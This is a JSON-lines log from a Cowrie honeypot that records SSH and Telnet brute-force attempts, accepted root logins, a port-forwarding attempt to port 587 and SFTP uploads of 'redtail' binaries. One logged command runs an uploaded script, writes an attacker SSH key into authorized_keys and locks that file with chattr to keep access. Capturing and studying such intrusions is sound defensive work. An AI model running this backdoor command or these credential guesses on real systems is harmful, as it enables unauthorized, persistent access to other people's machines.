:[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T22:17:03.156471Z","src_ip":"212.227.125.160","session":"a6162992efe4"}
{"eventid":"cowrie.login.success","username":"root","password":"calvin","message":"login attempt [root/calvin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:17:03.591352Z","src_ip":"212.227.125.160","session":"a6162992efe4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.125.160","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-28T22:17:03.674113Z","session":"a6162992efe4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-28T22:17:03.756483Z","src_ip":"212.227.125.160","session":"a6162992efe4"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:17:04.310317Z","src_ip":"212.227.125.160","session":"a6162992efe4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60480,"dst_ip":"1.2.3.4","dst_port":22,"session":"07e608de831a","protocol":"ssh","message":"New connection: 212.227.235.229:60480 (1.2.3.4:22) [session: 07e608de831a]","sensor":"my-vps","timestamp":"2025-08-28T22:17:24.677553Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:17:24.678598Z","src_ip":"212.227.235.229","session":"07e608de831a"}
{"eventid":"cowrie.client.kex","hassh":"9052c4ab4164c78256e71143dcfc7eac","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 9052c4ab4164c78256e71143dcfc7eac","sensor":"my-vps","timestamp":"2025-08-28T22:17:24.758867Z","src_ip":"212.227.235.229","session":"07e608de831a"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:17:24.841345Z","src_ip":"212.227.235.229","session":"07e608de831a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35684,"dst_ip":"1.2.3.4","dst_port":22,"session":"019bcbad5309","protocol":"ssh","message":"New connection: 212.227.125.160:35684 (1.2.3.4:22) [session: 019bcbad5309]","sensor":"my-vps","timestamp":"2025-08-28T22:19:09.314522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:19:11.369653Z","src_ip":"212.227.125.160","session":"019bcbad5309"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:19:11.370936Z","src_ip":"212.227.125.160","session":"019bcbad5309"}
{"eventid":"cowrie.login.success","username":"root","password":"Uc123456","message":"login attempt [root/Uc123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:19:20.635565Z","src_ip":"212.227.125.160","session":"019bcbad5309"}
{"eventid":"cowrie.session.closed","duration":"16.2","message":"Connection lost after 16.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:19:25.531138Z","src_ip":"212.227.125.160","session":"019bcbad5309"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":27846,"dst_ip":"1.2.3.4","dst_port":22,"session":"558f31c52954","protocol":"ssh","message":"New connection: 212.227.125.160:27846 (1.2.3.4:22) [session: 558f31c52954]","sensor":"my-vps","timestamp":"2025-08-28T22:19:25.589744Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:19:25.590731Z","src_ip":"212.227.125.160","session":"558f31c52954"}
{"eventid":"cowrie.client.kex","hassh":"5f904648ee8964bef0e8834012e26003","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 5f904648ee8964bef0e8834012e26003","sensor":"my-vps","timestamp":"2025-08-28T22:19:25.651066Z","src_ip":"212.227.125.160","session":"558f31c52954"}
{"eventid":"cowrie.login.success","username":"root","password":"Uc123456","message":"login attempt [root/Uc123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:19:25.830414Z","src_ip":"212.227.125.160","session":"558f31c52954"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:19:39.544986Z","src_ip":"212.227.125.160","session":"558f31c52954"}
{"eventid":"cowrie.command.input","input":"chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a","message":"CMD: chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a","sensor":"my-vps","timestamp":"2025-08-28T22:19:39.545682Z","src_ip":"212.227.125.160","session":"558f31c52954"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014","size":80,"shasum":"96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:19:39.606497Z","src_ip":"212.227.125.160","session":"558f31c52954"}
{"eventid":"cowrie.session.file_upload","filename":"clean.sh","outfile":"var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","shasum":"d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","message":"SFTP Uploaded file \"clean.sh\" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","sensor":"my-vps","timestamp":"2025-08-28T22:19:39.666089Z","src_ip":"212.227.125.160","session":"558f31c52954"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm7","outfile":"var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","shasum":"229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","message":"SFTP Uploaded file \"redtail.arm7\" to var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","sensor":"my-vps","timestamp":"2025-08-28T22:19:39.668455Z","src_ip":"212.227.125.160","session":"558f31c52954"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm8","outfile":"var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","shasum":"89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","message":"SFTP Uploaded file \"redtail.arm8\" to var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","sensor":"my-vps","timestamp":"2025-08-28T22:19:39.670983Z","src_ip":"212.227.125.160","session":"558f31c52954"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.i686","outfile":"var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","shasum":"ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","message":"SFTP Uploaded file \"redtail.i686\" to var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","sensor":"my-vps","timestamp":"2025-08-28T22:19:39.673536Z","src_ip":"212.227.125.160","session":"558f31c52954"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.x86_64","outfile":"var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","shasum":"d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","message":"SFTP Uploaded file \"redtail.x86_64\" to var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","sensor":"my-vps","timestamp":"2025-08-28T22:19:39.676256Z","src_ip":"212.227.125.160","session":"558f31c52954"}
{"eventid":"cowrie.session.file_upload","filename":"setup.sh","outfile":"var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","shasum":"783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","message":"SFTP Uploaded file \"setup.sh\" to var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","sensor":"my-vps","timestamp":"2025-08-28T22:19:39.677428Z","src_ip":"212.227.125.160","session":"558f31c52954"}
{"eventid":"cowrie.session.closed","duration":"14.1","message":"Connection lost after 14.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:19:39.738328Z","src_ip":"212.227.125.160","session":"558f31c52954"}
{"eventid":"cowrie.session.connect","src_ip":"36.251.194.42","src_port":54782,"dst_ip":"1.2.3.4","dst_port":22,"session":"e931b6441fb4","protocol":"ssh","message":"New connection: 36.251.194.42:54782 (1.2.3.4:22) [session: e931b6441fb4]","sensor":"my-vps","timestamp":"2025-08-28T22:20:07.067762Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:20:07.069007Z","src_ip":"36.251.194.42","session":"e931b6441fb4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51430,"dst_ip":"1.2.3.4","dst_port":23,"session":"02891c9948b2","protocol":"telnet","message":"New connection: 212.227.125.160:51430 (1.2.3.4:23) [session: 02891c9948b2]","sensor":"my-vps","timestamp":"2025-08-28T22:20:27.038409Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45874,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d73eb9b536c","protocol":"ssh","message":"New connection: 212.227.125.160:45874 (1.2.3.4:22) [session: 8d73eb9b536c]","sensor":"my-vps","timestamp":"2025-08-28T22:20:36.535301Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:20:36.536278Z","src_ip":"212.227.125.160","session":"8d73eb9b536c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T22:20:36.586873Z","src_ip":"212.227.125.160","session":"8d73eb9b536c"}
{"eventid":"cowrie.login.failed","username":"solv","password":"123456","message":"login attempt [solv/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T22:20:36.744149Z","src_ip":"212.227.125.160","session":"8d73eb9b536c"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":12074,"dst_ip":"1.2.3.4","dst_port":22,"session":"c022a94cca95","protocol":"ssh","message":"New connection: 80.94.95.112:12074 (1.2.3.4:22) [session: c022a94cca95]","sensor":"my-vps","timestamp":"2025-08-28T22:20:37.624140Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T22:20:37.683198Z","src_ip":"80.94.95.112","session":"c022a94cca95"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T22:20:37.712770Z","src_ip":"80.94.95.112","session":"c022a94cca95"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:20:37.796468Z","src_ip":"212.227.125.160","session":"8d73eb9b536c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"25101984","message":"login attempt [admin/25101984] failed","sensor":"my-vps","timestamp":"2025-08-28T22:20:37.919045Z","src_ip":"80.94.95.112","session":"c022a94cca95"}
{"eventid":"cowrie.login.failed","username":"admin","password":"250486","message":"login attempt [admin/250486] failed","sensor":"my-vps","timestamp":"2025-08-28T22:20:38.954738Z","src_ip":"80.94.95.112","session":"c022a94cca95"}
{"eventid":"cowrie.login.failed","username":"admin","password":"25041982","message":"login attempt [admin/25041982] failed","sensor":"my-vps","timestamp":"2025-08-28T22:20:39.987689Z","src_ip":"80.94.95.112","session":"c022a94cca95"}
{"eventid":"cowrie.login.failed","username":"admin","password":"25041981","message":"login attempt [admin/25041981] failed","sensor":"my-vps","timestamp":"2025-08-28T22:20:41.020927Z","src_ip":"80.94.95.112","session":"c022a94cca95"}
{"eventid":"cowrie.login.failed","username":"admin","password":"25041977","message":"login attempt [admin/25041977] failed","sensor":"my-vps","timestamp":"2025-08-28T22:20:42.056085Z","src_ip":"80.94.95.112","session":"c022a94cca95"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:20:43.089244Z","src_ip":"80.94.95.112","session":"c022a94cca95"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":61845,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a290502ddda","protocol":"ssh","message":"New connection: 212.227.235.229:61845 (1.2.3.4:22) [session: 9a290502ddda]","sensor":"my-vps","timestamp":"2025-08-28T22:20:56.965596Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T22:20:57.158490Z","src_ip":"212.227.235.229","session":"9a290502ddda"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T22:20:57.290429Z","src_ip":"212.227.235.229","session":"9a290502ddda"}
{"eventid":"cowrie.session.closed","duration":32.981635093688965,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:21:00.019953Z","src_ip":"212.227.125.160","session":"02891c9948b2"}
{"eventid":"cowrie.login.failed","username":"alanna","password":"alanna","message":"login attempt [alanna/alanna] failed","sensor":"my-vps","timestamp":"2025-08-28T22:21:00.965859Z","src_ip":"212.227.235.229","session":"9a290502ddda"}
{"eventid":"cowrie.login.failed","username":"alanna","password":"alanna1","message":"login attempt [alanna/alanna1] failed","sensor":"my-vps","timestamp":"2025-08-28T22:21:02.102507Z","src_ip":"212.227.235.229","session":"9a290502ddda"}
{"eventid":"cowrie.login.failed","username":"alanna","password":"alanna123","message":"login attempt [alanna/alanna123] failed","sensor":"my-vps","timestamp":"2025-08-28T22:21:03.240831Z","src_ip":"212.227.235.229","session":"9a290502ddda"}
{"eventid":"cowrie.login.failed","username":"alanna","password":"alanna1234","message":"login attempt [alanna/alanna1234] failed","sensor":"my-vps","timestamp":"2025-08-28T22:21:04.374830Z","src_ip":"212.227.235.229","session":"9a290502ddda"}
{"eventid":"cowrie.login.failed","username":"alanna","password":"alanna12345","message":"login attempt [alanna/alanna12345] failed","sensor":"my-vps","timestamp":"2025-08-28T22:21:05.522005Z","src_ip":"212.227.235.229","session":"9a290502ddda"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:21:06.656461Z","src_ip":"212.227.235.229","session":"9a290502ddda"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42652,"dst_ip":"1.2.3.4","dst_port":22,"session":"0fba50994c19","protocol":"ssh","message":"New connection: 212.227.125.160:42652 (1.2.3.4:22) [session: 0fba50994c19]","sensor":"my-vps","timestamp":"2025-08-28T22:21:36.736236Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:21:38.295595Z","src_ip":"212.227.125.160","session":"0fba50994c19"}
